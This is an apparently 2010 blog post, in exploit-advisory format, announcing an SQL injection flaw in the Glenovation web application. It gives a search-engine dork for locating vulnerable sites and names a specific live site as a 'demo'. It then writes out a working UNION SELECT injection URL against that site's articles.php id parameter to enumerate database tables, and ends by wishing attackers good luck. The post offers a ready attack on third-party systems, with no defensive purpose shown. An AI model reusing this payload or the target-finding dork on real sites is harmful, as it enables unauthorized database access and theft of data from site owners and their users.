25 Kasım 2010 Perşembe

Glenovation <= Based SQL Injection Vulnerability

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Glenovation
|~Price : N/A
|~Version : N/A
|~Software: http://www.glenovation.com
|~Vulnerability Style : Based SQL Injection
|~Vulnerability Dir : /
|~sqL : MysqL Based Error
|~Google Keyword : "Powered by Glenovation"
|[~]Date : "25.11.2010"
|[~]Tested on : (L):Vista (R):Apache/2 PHP/5.2.14 MySQL >=5
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos: 
http://www.companyregistry.eu
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ===============================================================
    |{~~~~~~~~ Explotation| indexlight.php SQL Injection~~~~~~~~~~~}|
    
    http://$Site/$path/articles.php?id=2 {SQL Injection}

    
    Ex; http://www.companyregistry.eu
    
    [~] SQL Injecting
    http://www.companyregistry.eu/articles.php?id=2 and 1=0 union select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40 from information_schema.tables where table_schema=database()
    [~] Need : data for http live Header. <=  use
     
    To your continue..

    =============================================================
    gOODLuck;)

Hiç yorum yok:

Yorum Gönder